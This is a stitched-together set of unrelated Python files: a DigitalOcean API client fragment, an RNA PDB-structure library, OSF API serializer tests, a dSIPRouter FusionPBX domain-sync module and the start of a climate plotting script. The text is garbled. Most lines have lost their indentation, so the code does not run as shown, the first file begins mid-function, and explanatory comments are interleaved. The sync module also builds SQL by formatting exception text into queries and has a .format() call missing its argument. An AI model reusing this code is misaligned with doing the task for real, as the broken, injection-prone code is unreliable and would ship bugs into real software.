images = [Image(conn=self._conn,**img) for img in images]
for k,v in filters.iteritems():
images = filter(lambda x: v in getattr(x,k), images)
return images
#convert dictionary to Image objects
return [Image(conn=self._conn, **img) for img in images]
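    # Filtering sketch (illustrative, not part of the original module): the
    # EC2-style `filters` dict does substring matching against attributes of
    # the returned objects, so assuming a client instance `d0`:
    #
    #     ubuntu_images = d0.get_all_images(filters={'name': 'Ubuntu'})
    #     web_droplets = d0.get_all_droplets(filters={'name': 'web'})
    #
    # Each value is matched with `value in getattr(obj, key)`, so string
    # attributes work best.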
def get_image(self, image_id=None):
"""
This method displays the attributes of an image.
:type image_id: int
:param image_id: The ID of the image
:rtype: :class:`doto.Image`
        :return: The requested :class:`doto.Image`.
https://api.digitalocean.com/images/[image_id]/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/images/%d" % (image_id)
data = self._conn.request(url)
log.debug(data)
return Image(conn=self._conn, **data['image'])
def get_all_domains(self,filters=None, status_check=None, table=False, raw_data=False):
"""
        This method returns all of the domains in your account.
        All available API information is presented for each domain.
        https://api.digitalocean.com/domains/?
        client_id=[your_client_id]&api_key=[your_api_key]
        :rtype: list
        :return: A list of :class:`doto.Domain`
"""
data = self._conn.request("/domains",status_check)
if status_check:
return data
if raw_data:
return data
if table:
self._pprint_table(data['domains'])
return
domains = data['domains']
if filters:
doms = [Domain(conn=self._conn, **drop) for drop in domains]
for k,v in filters.iteritems():
doms = filter(lambda x: v in getattr(x,k), doms)
return doms
#convert dictionary to droplet objects
return [Domain(conn=self._conn, **dom) for dom in domains]
def create_domain(self,name=None,ip_addr=None):
"""
This method creates a new domain name with an A record for the specified [ip_address].
:type name: string
        :param name: The name of the domain
        :type ip_addr: string
        :param ip_addr: IP address for the domain's initial A record.
https://api.digitalocean.com/domains/new?
client_id=[your_client_id]&api_key=[your_api_key]&name=[domain]&ip_address=[ip_address]
"""
log.debug("Creating new domain")
data = self._conn.request("/domains/new",name=name,
ip_address=ip_addr)
log.debug(data)
domain = Domain(conn=self._conn, **data['domain'])
return domain
def get_domain(self, domain_id=None):
"""
        This method displays the attributes of a domain.
        :type domain_id: int
        :param domain_id: The ID of the domain
        :rtype: :class:`doto.Domain`
        :return: The requested :class:`doto.Domain`.
https://api.digitalocean.com/domains/[domain_id]?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/domains/%d" % (domain_id)
data = self._conn.request(url)
log.debug(data)
return Domain(conn=self._conn, **data['domain'])
|
|
#!/usr/bin/env python
"""
library for manipulating PDB structures
"""
import sys
import os
import re
import shutil
try:
    from StringIO import StringIO  # Python 2
except ImportError:
    from io import StringIO  # Python 3
#import simplejson
import gzip
import tempfile
from optparse import OptionParser
from itertools import combinations
from scipy.spatial import KDTree
from Bio import PDB
import numpy as np
from numpy import array
from rna_tools.tools.clarna_play.ClaRNAlib.normalize_pdb import normalize_pdb
from rna_tools.tools.clarna_play.ClaRNAlib.utils import dist, REQ_ATOMS_LIST, simplify_residue
class StructureCiachCiach(object):
def __init__(self, structure, dont_normalize=False, req_atoms_list=REQ_ATOMS_LIST):
self.s = structure
self.dont_normalize = dont_normalize
self.res_dict = {}
# not used at this moment
# self.backbone_atoms = ["O3'", "C3'", "C4'", "C5'", "O5'", "P"]
for r in structure.get_residues():
if r.get_id()[0] != ' ':
continue
if dont_normalize:
key = r.parent.id + (str(r.get_id()[1])+str(r.get_id()[2])).strip()
else:
key = str(r.get_id()[1])
self.res_dict[key] = r
self.good_residues = []
self.good_residues_num = {}
p_coord = []
o3p_coord = []
c1p_coord = []
for (key,r) in list(self.res_dict.items()):
resname = r.get_resname().strip()
if len(resname)!=1:
continue
atoms = simplify_residue(r)
if atoms is None or not all([a in atoms for a in req_atoms_list]):
continue
p_atom = self._locate_atom(r, 'P')
if p_atom is None:
p_atom = [0,0,0]
else:
p_atom = p_atom.get_coord()
o3p_atom = self._locate_atom(r, "O3'")
if o3p_atom is None:
o3p_atom = [0,0,0]
else:
o3p_atom = o3p_atom.get_coord()
c1p_atom = self._locate_atom(r, "C1'")
if c1p_atom is None:
c1p_atom = [0,0,0]
else:
c1p_atom = c1p_atom.get_coord()
self.good_residues_num[key] = len(self.good_residues)
self.good_residues.append(key)
p_coord.append(p_atom)
o3p_coord.append(o3p_atom)
c1p_coord.append(c1p_atom)
if len(p_coord)==0:
p_coord.append(array([0,0,0],'f'))
if len(o3p_coord)==0:
o3p_coord.append(array([0,0,0],'f'))
if len(c1p_coord)==0:
c1p_coord.append(array([0,0,0],'f'))
self.p_tree = KDTree(p_coord)
self.o3p_tree = KDTree(o3p_coord)
self.c1p_coord = c1p_coord
self.c1p_tree = KDTree(c1p_coord)
def get_resname(self, num):
if num not in self.res_dict:
return '?'
return self.res_dict[num].get_resname().strip()
def get_res_atoms_dict(self, num):
if num not in self.res_dict:
return None
res = {}
for a in self.res_dict[num]:
res[a.id] = a.get_coord().tolist()
# add O3' from next nucleotide
o3p_residue = self._locate_backbone(self.res_dict[num], 'P')
if o3p_residue is not None:
for a in o3p_residue:
res["NEXT:%s"%a.id]=a.get_coord().tolist()
return res
def _locate_atom(self, r, id):
for a in r:
if a.id==id:
return a
return None
def _locate_backbone(self, r, atom):
# TODO: use all residues for locating other atoms!
a = self._locate_atom(r,atom)
if a is None:
return None
point = a.get_coord()
res_key = None
if atom=='P':
(d,p) = self.o3p_tree.query(point, k=1)
else:
(d,p) = self.p_tree.query(point, k=1)
if d<1.4 or d>1.7:
return None
res_key = self.good_residues[p]
rr = self.res_dict[res_key]
if r.id==rr.id:
return None
result = PDB.Residue.Residue(rr.id, rr.resname, rr.segid)
if atom == 'P':
other_atoms = ["O3'"]
else:
other_atoms = ["P","OP1","O5'","OP2"]
for a in rr:
if a.id in other_atoms:
result.add(a)
return result
    def initalize_get_neighbours_other(self):
self.all_atoms_coords = []
self.all_atoms_res = []
for (key,r) in list(self.res_dict.items()):
for a in r:
self.all_atoms_coords.append(a.get_coord())
self.all_atoms_res.append(key)
self.all_atoms_tree = KDTree(self.all_atoms_coords)
def residue_distance(self, num1, num2, max_distance=100):
d = 1000
if num1 not in self.res_dict or num2 not in self.res_dict:
return d
for a1 in self.res_dict[num1]:
p1 = a1.get_coord()
for a2 in self.res_dict[num2]:
p2 = a2.get_coord()
d = min(d, dist(p1,p2))
if d<max_distance:
return d
return d
def get_neighbours(self, num, max_distance=4.0):
if num not in self.good_residues_num:
return []
i = self.good_residues_num[num]
res = []
points = self.c1p_tree.query_ball_point(self.c1p_coord[i], r=max_distance+15.0)
for j in points:
if i==j or j>=len(self.good_residues):
continue
num2 = self.good_residues[j]
if self.residue_distance(num,num2,max_distance)<=max_distance:
res.append(num2)
return res
def get_neighbours_other(self, num, max_distance=4.0):
if num not in self.res_dict:
return []
res = set()
for a in self.res_dict[num]:
if not (a.id in ['P',"C1'","C6"]):
continue
points = self.all_atoms_tree.query_ball_point(a.get_coord(), r=max_distance)
for j in set(points):
if j>=len(self.all_atoms_coords):
continue
num2 = self.all_atoms_res[j]
if num2!=num:
res.add(num2)
return list(res)
def get_single_residue(self, num, with_backbone=False):
if num not in self.res_dict:
return None
r1 = self.res_dict[num]
structure = PDB.Structure.Structure("extracted")
model = PDB.Model.Model(1)
structure.add(model)
c1 = PDB.Chain.Chain("A")
if with_backbone:
r = self._locate_backbone(r1,'P')
if r is not None:
c1.add(r)
c1.add(r1)
if with_backbone:
r = self._locate_backbone(r1,"O3'")
if r is not None:
c1.add(r)
model.add(c1)
return structure
def extract(self,fn, num1, num2, desc, n_type, prg, with_backbone=False):
if num1 not in self.res_dict:
return False
r1 = self.res_dict[num1]
if num2 not in self.res_dict:
return False
r2 = self.res_dict[num2]
if fn=="dict-no-pdb":
return {
'resseq_1': num1[1:],
'resseq_2': num2[1:],
'chain_1': num1[0],
'chain_2': num2[0],
'desc': desc,
'n_type': n_type,
'prg': prg,
}
structure = PDB.Structure.Structure("extracted")
model = PDB.Model.Model(1)
structure.add(model)
c1_id = "A"
c1 = PDB.Chain.Chain(c1_id)
if with_backbone:
r = self._locate_backbone(r1,'P')
if r is not None:
c1.add(r)
c1.add(r1)
if with_backbone:
r = self._locate_backbone(r1,"O3'")
if r is not None:
c1.add(r)
c2_id = "B"
c2 = PDB.Chain.Chain(c2_id)
if with_backbone:
r = self._locate_backbone(r2,'P')
if r is not None:
c2.add(r)
c2.add(r2)
if with_backbone:
r = self._locate_backbone(r2,"O3'")
if r is not None:
c2.add(r)
model.add(c1)
model.add(c2)
if fn=="dict":
            output = StringIO()
io = PDB.PDBIO()
io.set_structure(structure)
io.save(output)
return {
'resseq_1': num1[1:],
'resseq_2': num2[1:],
'chain_1': num1[0],
'chain_2': num2[0],
'pdb': output.getvalue(),
'desc': desc,
'n_type': n_type,
'prg': prg,
}
else:
io = PDB.PDBIO()
io.set_structure(structure)
io.save(fn)
return True
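# Usage sketch (illustrative, not part of the original module): building a
# StructureCiachCiach from a PDB file with Bio.PDB and querying contacts.
#
#     from Bio import PDB
#     parser = PDB.PDBParser(QUIET=True)
#     structure = parser.get_structure("rna", "example.pdb")
#     cc = StructureCiachCiach(structure, dont_normalize=True)
#     for key in cc.good_residues:
#         print(key, cc.get_resname(key), cc.get_neighbours(key, max_distance=4.0))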
|
|
# -*- coding: utf-8 -*-
import httplib as http
import contextlib
import mock
from nose.tools import * # flake8: noqa
from tests.base import ApiTestCase, DbTestCase
from tests import factories
from tests.utils import make_drf_request
from api.base.settings.defaults import API_BASE
from api.base.serializers import JSONAPISerializer
from api.base import serializers as base_serializers
from api.nodes.serializers import NodeSerializer, RelationshipField
class FakeModel(object):
def null_field(self):
return None
def valued_field(self):
return 'Some'
null = None
foo = 'bar'
pk = '1234'
class FakeSerializer(base_serializers.JSONAPISerializer):
class Meta:
type_ = 'foos'
links = base_serializers.LinksField({
'null_field': 'null_field',
'valued_field': 'valued_field',
})
null_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<null>'},
)
valued_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<foo>'},
)
def null_field(*args, **kwargs):
return None
def valued_field(*args, **kwargs):
return 'http://foo.com'
class TestNullLinks(ApiTestCase):
def test_null_links_are_omitted(self):
req = make_drf_request()
rep = FakeSerializer(FakeModel, context={'request': req}).data['data']
assert_not_in('null_field', rep['links'])
assert_in('valued_field', rep['links'])
assert_not_in('null_link_field', rep['relationships'])
assert_in('valued_link_field', rep['relationships'])
class TestApiBaseSerializers(ApiTestCase):
def setUp(self):
super(TestApiBaseSerializers, self).setUp()
self.node = factories.ProjectFactory(is_public=True)
for i in range(5):
factories.ProjectFactory(is_public=True, parent=self.node)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
def test_counts_not_included_in_link_fields_by_default(self):
res = self.app.get(self.url)
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {}:
continue
link = relation['links'].values()[0]
assert_not_in('count', link['meta'])
def test_counts_included_in_link_fields_with_related_counts_query_param(self):
res = self.app.get(self.url, params={'related_counts': True})
relationships = res.json['data']['relationships']
for key, relation in relationships.iteritems():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if (field.related_meta or {}).get('count'):
link = relation['links'].values()[0]
assert_in('count', link['meta'])
def test_related_counts_excluded_query_param_false(self):
res = self.app.get(self.url, params={'related_counts': False})
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {}:
continue
link = relation['links'].values()[0]
assert_not_in('count', link['meta'])
def test_invalid_related_counts_value_raises_bad_request(self):
res = self.app.get(self.url, params={'related_counts': 'fish'}, expect_errors=True)
assert_equal(res.status_code, http.BAD_REQUEST)
def test_invalid_embed_value_raise_bad_request(self):
res = self.app.get(self.url, params={'embed': 'foo'}, expect_errors=True)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(res.json['errors'][0]['detail'], "The following fields are not embeddable: foo")
class TestRelationshipField(DbTestCase):
# We need a Serializer to test the Relationship field (needs context)
class BasicNodeSerializer(JSONAPISerializer):
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'}
)
parent_with_meta = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_count', 'extra': 'get_extra'},
)
self_and_related_field = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
self_view='nodes:node-contributors',
self_view_kwargs={'node_id': '<pk>'},
)
two_url_kwargs = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-pointer-detail',
related_view_kwargs={'node_id': '<pk>', 'node_link_id': '<pk>'},
)
not_attribute_on_target = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-children',
related_view_kwargs={'node_id': '12345'}
)
class Meta:
type_ = 'nodes'
def get_count(self, obj):
return 1
def get_extra(self, obj):
return 'foo'
# TODO: Expand tests
# Regression test for https://openscience.atlassian.net/browse/OSF-4832
def test_serializing_meta(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
meta = data['relationships']['parent_with_meta']['links']['related']['meta']
assert_not_in('count', meta)
assert_in('extra', meta)
assert_equal(meta['extra'], 'foo')
def test_self_and_related_fields(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
relationship_field = data['relationships']['self_and_related_field']['links']
assert_in('/v2/nodes/{}/contributors/'.format(node._id), relationship_field['self']['href'])
assert_in('/v2/nodes/{}/'.format(node._id), relationship_field['related']['href'])
def test_field_with_two_kwargs(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
field = data['relationships']['two_url_kwargs']['links']
assert_in('/v2/nodes/{}/node_links/{}/'.format(node._id, node._id), field['related']['href'])
def test_field_with_non_attribute(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
field = data['relationships']['not_attribute_on_target']['links']
assert_in('/v2/nodes/{}/children/'.format('12345'), field['related']['href'])
|
|
import os, psycopg2, hashlib, MySQLdb, subprocess, docker
from database import dSIPMultiDomainMapping
from util.security import AES_CTR
from shared import safeUriToHost
# TODO: error handling here is pretty bad, we need to establish the connection in the main func and pass conn/cursors to the sub funcs
# I implemented an example of proper connection / cursor handling in sync_needed(), we need to move that to the entry func
# i.e. run_sync() should utilize the proper handling of the connections/cursors and pass them to the sub functions
# Obtain a set of FusionPBX systems that contains domains that Kamailio will route traffic to.
def get_sources(db):
# Dictionary object to hold the set of source FusionPBX systems
sources = {}
# Kamailio Database Parameters
kam_hostname = db['hostname']
kam_username = db['username']
kam_password = db['password']
kam_database = db['database']
try:
db = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
c = db.cursor()
c.execute(
"""select pbx_id,address as pbx_host,db_host,db_username,db_password,domain_list,domain_list_hash,attr_list,dsip_multidomain_mapping.type from dsip_multidomain_mapping join dr_gw_lists on dsip_multidomain_mapping.pbx_id=dr_gw_lists.id join dr_gateways on dr_gateways.gwid = dr_gw_lists.gwlist where enabled=1""")
results = c.fetchall()
db.close()
for row in results:
            # Store the PBX address (pbx_host) as the key and the entire row as the value
sources[row[1]] = row
except Exception as e:
print(str(e))
return sources
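# NOTE (added for clarity): each row returned by get_sources() follows the
# column order of the SELECT above, i.e.
#   row[0]=pbx_id, row[1]=pbx_host (address), row[2]=db_host, row[3]=db_username,
#   row[4]=db_password, row[5]=domain_list, row[6]=domain_list_hash,
#   row[7]=attr_list, row[8]=type
# The functions below index into this tuple, so keep the SELECT and these
# indexes in sync.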
# Will remove all of the fusionpbx domain data so that it can be rebuilt
def drop_fusionpbx_domains(source, dest):
# PBX Domain Mapping Parameters
pbx_domain_list = source[5]
    pbx_attr_list = source[7]
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
pbx_domain_list = list(map(int, filter(None, pbx_domain_list.split(","))))
pbx_attr_list = list(map(int, filter(None, pbx_attr_list.split(","))))
kam_conn = None
kam_curs = None
try:
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
        if len(pbx_domain_list) > 0:
            kam_curs.execute("""DELETE FROM domain WHERE id IN({})""".format(','.join(map(str, pbx_domain_list))))
        if len(pbx_attr_list) > 0:
            kam_curs.execute("""DELETE FROM domain_attrs WHERE id IN({})""".format(','.join(map(str, pbx_attr_list))))
kam_conn.commit()
except Exception as ex:
error = str(ex)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format(error))
kam_conn.commit()
except:
pass
raise ex
finally:
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def sync_db(source, dest):
# FusionPBX Database Parameters
pbx_id = source[0]
pbx_host = source[1]
if ':' in source[2]:
fpbx_hostname = source[2].split(':')[0]
fpbx_port = source[2].split(':')[1]
else:
fpbx_hostname = source[2]
fpbx_port = 5432
fpbx_username = source[3]
fpbx_password = source[4]
pbx_domain_list = source[5]
    pbx_attr_list = source[7]
pbx_type = source[8]
fpbx_database = 'fusionpbx'
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
domain_id_list = []
attr_id_list = []
fpbx_conn = None
fpbx_curs = None
kam_conn = None
kam_curs = None
try:
# Get a connection to Kamailio Server DB
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
# Delete existing domain for the pbx
pbx_domain_list_str = ''.join(str(e) for e in pbx_domain_list)
if len(pbx_domain_list_str) > 0:
query = "delete from domain where id in ({})".format(pbx_domain_list_str)
kam_curs.execute(query)
pbx_domain_list = ''
        # Try connecting to the PostgreSQL database using a trust relationship first
fpbx_conn = psycopg2.connect(dbname=fpbx_database, user=fpbx_username, host=fpbx_hostname, port=fpbx_port, password=fpbx_password)
if fpbx_conn is not None:
print("Connection to FusionPBX:{} database was successful".format(fpbx_hostname))
fpbx_curs = fpbx_conn.cursor()
fpbx_curs.execute("""select domain_name from v_domains where domain_enabled='true'""")
rows = fpbx_curs.fetchall()
if rows is not None:
counter = 0
domain_name_str = ""
for row in rows:
kam_curs.execute("""insert ignore into domain (id,domain,did,last_modified) values (null,%s,%s,NOW())""",
(row[0], row[0]))
if kam_curs.rowcount > 0:
kam_curs.execute(
"""SELECT AUTO_INCREMENT FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME IN('domain') ORDER BY FIND_IN_SET(TABLE_NAME, 'domain')""")
rows_left = kam_curs.fetchall()
domain_id_list.append(str(rows_left[0][0] - 1))
# Delete all domain_attrs for the domain first
kam_curs.execute("""delete from domain_attrs where did=%s""", [row[0]])
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_ip',2,%s,NOW())""",
(row[0], pbx_host))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_type',2,%s,NOW())""",
(row[0], pbx_type))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'created_by',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'dispatcher_set_id',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'dispatcher_reg_alg',2,%s,NOW())""",
(row[0], 4))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'domain_auth',2,%s,NOW())""",
(row[0], 'passthru'))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_list',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'description',2,%s,NOW())""",
(row[0], 'notes:'))
counter = counter + 1
domain_name_str += row[0]
                # Convert to a comma-separated string
domain_id_list = ','.join(domain_id_list)
if not pbx_domain_list: # if empty string then this is the first set of domains
pbx_domain_list = domain_id_list
else: # adding to an existing list of domains
pbx_domain_list = pbx_domain_list + "," + domain_id_list
print("[sync_db] String of domains: {}".format(domain_name_str))
# Create Hash of the string
domain_name_str_hash = hashlib.md5(domain_name_str.encode('utf-8')).hexdigest()
print("[sync_db] Hashed String of domains: {}".format(domain_name_str_hash))
kam_curs.execute(
"""update dsip_multidomain_mapping set domain_list=%s, domain_list_hash=%s,syncstatus=1, lastsync=NOW(),syncerror='' where pbx_id=%s""",
(pbx_domain_list, domain_name_str_hash, pbx_id))
kam_conn.commit()
except Exception as ex:
error = str(ex)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format(error))
kam_conn.commit()
except:
pass
raise ex
finally:
if fpbx_conn is not None:
fpbx_conn.close()
if fpbx_curs is not None:
fpbx_curs.close()
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def reloadkam(kamcmd_path):
try:
# subprocess.call(['kamcmd' ,'permissions.addressReload'])
# subprocess.call(['kamcmd','drouting.reload'])
subprocess.call([kamcmd_path, 'domain.reload'])
return True
except:
return False
def update_nginx(sources):
print("Updating Nginx")
# Connect to docker
client = docker.from_env()
if client is not None:
print("Got handle to docker")
try:
# If there isn't any FusionPBX sources then just shutdown the container
if len(sources) < 1:
containers = client.containers.list()
for container in containers:
if container.name == "dsiprouter-nginx":
# Stop the container
container.stop()
container.remove(force=True)
print("Stopped nginx container")
return
except Exception as e:
os.remove("./.sync-lock")
print(e)
# Create the Nginx file
serverList = ""
for source in sources:
serverList += "server " + safeUriToHost(str(source)) + ":443;\n"
# print(serverList)
script_dir = os.path.dirname(os.path.abspath(__file__))
# print(script_dir)
input = open(script_dir + "/dsiprouter.nginx.tpl")
output = open(script_dir + "/dsiprouter.nginx", "w")
output.write(input.read().replace("##SERVERLIST##", serverList))
output.close()
input.close()
# Check if dsiprouter-nginx is running. If so, reload nginx
containers = client.containers.list()
print("past container list")
for container in containers:
if container.name == "dsiprouter-nginx":
# Execute a command to reload nginx
container.exec_run("nginx -s reload")
print("Reloaded nginx")
return
# Start the container if one is not running
try:
print("trying to create a container")
host_volume_path = script_dir + "/dsiprouter.nginx"
html_volume_path = script_dir + "/html"
cert_volume_path = script_dir + "/certs"
# host_volume_path = script_dir
print(host_volume_path)
# remove the container with a name of dsiprouter-nginx to avoid conflicts if it already exists
        containerList = client.containers.list(all=True, filters={'name': 'dsiprouter-nginx'})
containerFound = False
for c in containerList:
if c.name == "dsiprouter-nginx":
containerFound = True
if containerFound:
print("dsiprouter-nginx found...about to remove it and recreate")
container = client.containers.get('dsiprouter-nginx')
container.remove()
client.containers.run(image='nginx:latest',
name="dsiprouter-nginx",
ports={'80/tcp': '80/tcp', '443/tcp': '443/tcp'},
volumes={
host_volume_path: {'bind': '/etc/nginx/conf.d/default.conf', 'mode': 'rw'},
html_volume_path: {'bind': '/etc/nginx/html', 'mode': 'rw'},
cert_volume_path: {'bind': '/etc/ssl/certs', 'mode': 'rw'}
},
detach=True)
print("created a container")
except Exception as e:
os.remove("./.sync-lock")
print(str(e))
def sync_needed(source, dest):
# FusionPBX Database Parameters
pbx_id = source[0]
pbx_host = source[1]
if ':' in source[2]:
fpbx_hostname = source[2].split(':')[0]
fpbx_port = source[2].split(':')[1]
else:
fpbx_hostname = source[2]
fpbx_port = 5432
fpbx_username = source[3]
fpbx_password = source[4]
pbx_domain_list = source[5]
pbx_domain_list_hash = source[6]
pbx_attr_list = source[7]
pbx_type = source[8]
fpbx_database = 'fusionpbx'
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
domain_id_list = []
attr_id_list = []
need_sync = True
fpbx_conn = None
fpbx_curs = None
kam_conn = None
kam_curs = None
# Trying connecting to the databases
try:
# Get a connection to Kamailio Server DB
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
if kam_curs is not None:
print("[sync_needed] Connection to Kamailio DB:{} database was successful".format(kam_hostname))
# Get a connection to the FusionPBX Server
fpbx_conn = psycopg2.connect(dbname=fpbx_database, user=fpbx_username, host=fpbx_hostname, port=fpbx_port, password=fpbx_password)
if fpbx_conn is not None:
print("[sync_needed] Connection to FusionPBX:{} database was successful".format(fpbx_hostname))
fpbx_curs = fpbx_conn.cursor()
fpbx_curs.execute("""select domain_name from v_domains where domain_enabled='true'""")
rows = fpbx_curs.fetchall()
if rows is not None:
domain_name_str = ""
# Build a string that contains all of the domains
for row in rows:
domain_name_str += row[0]
print("[sync_needed] String of domains: {}".format(domain_name_str))
# Create Hash of the string
domain_name_str_hash = hashlib.md5(domain_name_str.encode('utf-8')).hexdigest()
print("[sync_needed] Hashed String of domains: {}".format(domain_name_str_hash))
if domain_name_str_hash == pbx_domain_list_hash:
# Sync not needed. Will update the syncstatus=2 to denote a domain change was not detected
kam_curs.execute("""update dsip_multidomain_mapping set syncstatus=2, lastsync=NOW()""")
kam_conn.commit()
need_sync = False
else:
# No domains yet, so no need to sync
kam_curs.execute("""update dsip_multidomain_mapping set syncstatus=3, lastsync=NOW()""")
kam_conn.commit()
need_sync = False
return need_sync
except Exception as e:
error = str(e)
print(error)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format())
kam_conn.commit()
except:
pass
finally:
if fpbx_conn is not None:
fpbx_conn.close()
if fpbx_curs is not None:
fpbx_curs.close()
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def run_sync(settings):
try:
# Set the system where sync'd data will be stored.
# The Kamailio DB in our case
# If already running - don't run
if os.path.isfile("./.sync-lock"):
print("Already running")
return
else:
f = open("./.sync-lock", "w+")
f.close()
# need to decrypt password if encrypted
if isinstance(settings.KAM_DB_PASS, bytes):
kam_password = AES_CTR.decrypt(settings.KAM_DB_PASS).decode('utf-8')
else:
kam_password = settings.KAM_DB_PASS
dest = {}
dest['hostname'] = settings.KAM_DB_HOST
dest['username'] = settings.KAM_DB_USER
dest['password'] = kam_password
dest['database'] = settings.KAM_DB_NAME
# Get the list of FusionPBX's that needs to be sync'd
sources = get_sources(dest)
# Loop thru each FusionPBX system and start the sync
for key in sources:
if sync_needed(sources[key], dest):
#drop_fusionpbx_domains(sources[key], dest)
sync_db(sources[key], dest)
else:
print("[run_sync] No sync needed for source: {}".format(sources[key][1]))
# Reload Kamailio
reloadkam(settings.KAM_KAMCMD_PATH)
# Update Nginx configuration file for HTTP Provisioning and start docker container if we have FusionPBX systems
# update_nginx(sources[key])
if sources is not None and len(sources) > 0:
sources = list(sources.keys())
update_nginx(sources)
except Exception as e:
print(str(e))
finally:
# Remove lock file
os.remove("./.sync-lock")
|
|
"""Plot spatial P-E"""
import re
import sys
script_dir = sys.path[0]
import os
import pdb
import argparse
import numpy as np
import matplotlib.pyplot as plt
import iris
from iris.experimental.equalise_cubes import equalise_attributes
import cartopy.crs as ccrs
import cmdline_provenance as cmdprov
repo_dir = '/'.join(script_dir.split('/')[:-2])
module_dir = repo_dir + '/modules'
sys.path.append(module_dir)
try:
import general_io as gio
import timeseries
except ImportError:
raise ImportError('Script and modules in wrong directories')
def regrid(cube):
"""Define the sample points for interpolation"""
lats = list(np.arange(-89, 90, 2))
lons = list(np.arange(1, 360, 2))
sample_points = []
coord_names = [coord.name() for coord in cube.dim_coords]
if 'time' in coord_names:
coord_names.remove('time')
for coord in coord_names:
if 'lat' in coord:
sample_points.append((coord, lats))
elif 'lon' in coord:
sample_points.append((coord, lons))
cube = cube.interpolate(sample_points, iris.analysis.Linear())
cube.coord('latitude').guess_bounds()
cube.coord('longitude').guess_bounds()
cube.coord('latitude').standard_name = 'latitude'
cube.coord('latitude').long_name = 'latitude'
cube.coord('latitude').var_name = 'lat'
cube.coord('latitude').units = 'degrees_north'
cube.coord('latitude').attributes = {}
cube.coord('longitude').standard_name = 'longitude'
cube.coord('longitude').long_name = 'longitude'
cube.coord('longitude').var_name = 'lon'
cube.coord('longitude').units = 'degrees_east'
cube.coord('longitude').circular = True
cube.coord('longitude').attributes = {}
return cube
def get_cube_list(infiles, agg, time_bounds=None, quick=False):
"""Read and process data."""
assert agg in ['clim', 'anom']
ensemble_cube_list = iris.cube.CubeList([])
for ensnum, ensemble_member in enumerate(infiles):
print(ensemble_member)
cube, history = gio.combine_files(ensemble_member,
'precipitation_minus_evaporation_flux',
new_calendar='365_day')
cube = gio.check_time_units(cube)
if time_bounds:
time_constraint = gio.get_time_constraint(time_bounds)
cube = cube.extract(time_constraint)
elif quick:
cube = cube[0:120, ::]
if agg == 'clim':
cube = timeseries.convert_to_annual(cube, aggregation='mean', days_in_month=True)
cube = cube.collapsed('time', iris.analysis.MEAN)
elif agg == 'anom':
start_data = cube.data[0, ::]
cube = cube[-1, ::]
cube.data = cube.data - start_data
cube.remove_coord('time')
cube = regrid(cube)
new_aux_coord = iris.coords.AuxCoord(ensnum, long_name='ensemble_member', units='no_unit')
cube.add_aux_coord(new_aux_coord)
cube.cell_methods = ()
ensemble_cube_list.append(cube)
